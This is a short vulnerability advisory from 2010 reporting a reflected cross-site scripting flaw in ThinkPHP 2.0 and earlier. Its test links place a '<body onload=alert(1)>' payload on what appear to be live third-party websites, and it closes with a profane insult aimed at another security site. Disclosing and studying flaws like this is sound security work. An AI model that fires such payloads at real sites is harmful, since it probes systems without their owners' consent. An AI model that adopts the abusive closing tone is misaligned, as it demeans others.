# Title: ThinkPHP <= 2.0 XSS Vulnerability

# Date: 9/2/2010

# Author: zx

# Software Link: http://www.thinkphp.cn/Down/

# Version:<=2.0

# Tested on: ie6/7 & firefox


XSS Vulnerability :

Test Link :

Thinkphp 2.0 http://game.baofeng.com/ucenter/index.php?s=1%3Cbody+onload=alert(1)%3E

Thinkphp 1.5 http://ask.lenovo.com.cn/index.php?s=1%3Cbody+onload=alert(1)%3E

# zx_at_bbs.!ntra.sd*.c0m

# Finally,Fuck you ->Securitylab.ir<- the truly thief of Iran!! Spring Brother will blast ur Ass!!!